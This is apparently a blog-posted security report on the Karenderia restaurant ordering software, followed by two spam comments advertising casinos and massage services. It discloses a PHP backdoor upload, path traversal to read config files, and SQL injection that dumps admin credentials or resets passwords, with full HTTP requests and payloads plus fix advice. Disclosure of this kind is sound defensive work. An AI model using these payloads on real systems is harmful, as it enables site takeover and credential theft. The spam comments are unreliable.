Karenderia Multiple Restaurant System Report.
1. UNRESTRICTED FILE UPLOAD
File: protected/components/AjaxAdmin.php
Function name: uploadImage
The error lies here is. $qqfile=$_GET['qqfile']; preg_match("/.php/i",
$qqfile) now the function get the file name from get request variables and
test if it consists of any php extension.
But for naming and moving file
$this->data variable is
passed. So if attacker sends get request for file upload value of checking
parameter i.e $qqfile and $this->data[‘qqfile’] will be same. But in case
of POST Request with qqfile as query parameter the result is different as
shown.
$pathinfo = pathinfo($this->data['qqfile']);
Now if I send a POST Request instead of GET to server with POST parameters:
qqfile = backdoor.php content = <?php code…. ?>
the file will be uploaded.
Example:
POST Request:

POST /admin/ajax?qqfile=avatr.png HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
Content-Length: 7
Content-Type: application/x-www-form-urlencoded
action=uploadImage&qqfile=backdoor.php¤tController=admin&content=<?php code.... ?>

here You will see that “?qqfile=avatar.png” is GET parameter and this
successfully pass your testing case for php.
And POST parameter qqfile will be used for
file name hence php backdoor will be uploaded.
One more thing. CurrentController=admin.
Instead of value “admin” value “store” can also be used (any value will be ok for currenController). There is not check present in the code to determine if session is for
admin or store. (taking ABOUT uploadImage function specially).
How to Prevent it.
1. Instead use the method used in MOBILEAPP module for uploading
file i.e in protected\modules\mobileapp\components\uploder.php.
Or
2. modify code for function uploadImage as explained.
$qqfile = $this->data['qqfile'];
Instead of $qqfile = $_GET[‘qqfile’];
Now weather it be POST OR GET request parameters variable both will be
tested out.
And instead of PREG_MATCH for testing out if extension is Php or not.
Make an array of allowed file extension.
$ allowed = [‘.jpg’,.JPG’,’.png’…….;
If(extension in allowed array){
$newfiename = oldname+timestamp+extension;
}
I am suggesting this because PREG_MATCH which produce INVALID FILE for a
image name: “xyzdsfkj.phpxyz123.png
Appending extension name from allowed one’s prevent renaming of uploaded
file of attacker choice. Thus whatever the file name and extension be in the
end only the allowed extension will be appended.
Now upload is safe.
2. LOCAL FILE INCLUSION.
Condition: can only be exploit
after admin login. ( sql injection to view admin_user passwords and then
login with it).
File: AdminController.php
Function actionviewFile
GET parameter : fileName.
Now fileName=xyzimage.jpg will show file from upload directory but using
file traversal ../../ we can view any file within permission of php script.
It is very harmful for VPS hosted website because linux file system can be
view and that helps to takeover full system. Example:
http://bastisapp.com/kmrs/admin/viewfile?fileName=../protected/config/main.php
MOST IMPORTANT SQL INJECTION
Vulnerable files: Ajax.php,
AjaxAdmin.php or any other files that are using Db operations and
unsanitized input from user.
Example how sql injection was
performed using union query.
File: AjaxAdmin.php
Function:
loadCreditCardListMerchant
Injection parameter:
merchant_id
Payload for union: 1’ and 1=2 union all select
$injection_point,2,3,4,5,6,7,8,9,10 # Payload for stack query = 1’ ;
$sql_query ; #
Original Post Request:

POST /kmrs/admin/ajax HTTP/1.1
Host: bastisapp.com
Connection: keep-alive
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome /537.36
Referer: http://bastiapp.com/kmrs/profile
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8,hi;q=0.7
Cookie: _lang=en; kr_cookie_law=2;
kr_search_address=Los+Angeles%2C+CA%2C+United+States;
client_location=%7B%22lat%22%3A34.0522342%2C%22long%22%3A-118.2436849%7D;
PHPSESSID=9793600ef0691414fd809e6b7524df45;
YII_CSRF_TOKEN=c47c288be746247583d9f19c288f76d579e5efab
merchant_id=1&action=loadCreditCardListMerchant¤tController=store&yii_session_token=9793600ef069141
4fd809e6b7524df45&YII_CSRF_TOKEN=c47c288be746247583d9f19c288f76d579e5efab

this is original request can be modified to view desired result.
Like we know that merchant_cc table have 10 columns and select * ….. query
is used in that function.
So we will make union query for 10 column as shown in payload.
The POST requested merchant_id paratmer will be modified to :
merchant_id=1’ and 1=2 union all select
concat(username,password),2,3,4,5,6,7,8,10 from mt_admin_user # this will make query in your PHP application as to be executed.
SELECT * FROM
{{merchant_cc}} WHERE
merchant_id='1’ and 1=2 union all select
concat(username,0x20,password),2,3,4,5,6,7,8,10 from mt_admin_user #'
ORDER BY mt_id DESC
And your app will return:
Now the Dangerous Stack Queries:
same post request modified for merchant_id parameter as:
merchant_id =1’ ; sql_query ; #
here the sql_query can: update,delete, alter,drop.
Example drop database db_name
The generated sql query will be:
SELECT * FROM
{{merchant_cc}} WHERE
merchant_id= ‘1’ ; update mt_admin_user set password = ‘new_md5_hash_for_pass_you_know’
where admin_id=1 ; # ‘
ORDER BY mt_id DESC

Please not that you cannot execute Select statement from stack query unless
the code is really really bad.
PREVENTION:
1.
Prevention is to use quote value function, or sanitize string
for longer text from yii in all the Db operations where the sql query is
used with input (GET/POST) from user.
2.
Prepared statements are used in php for fully protection from
injection. ( you may check if yii 1 supports prepared statements or
not).
Please note that I have displayed only for loadmerchantcreditcard
function the same method will be applicable for any other function that is
interacting with database without properly sanitizing the input from user.
You will need to take prevention steps wherever this type of mistake is
done to make secure application.
Links: https://codecanyon.net/item/karenderia-multiple-restaurant-system/9118694
2 Comments
Play online casino games for real money - Online Casino
ReplyDeleteEnjoy a wide happyluke range 카지노 of casino games online with the option jeetwin to choose from hundreds of casino games to play on your laptop or mobile device.
Casino - Dr.MCD
ReplyDeleteCasino. Dr.MCD's database contains all 밀양 출장마사지 the information 포항 출장마사지 you need to 나주 출장마사지 know about online 대구광역 출장마사지 gambling in order to 광주 출장샵 keep you organized. It's not only about the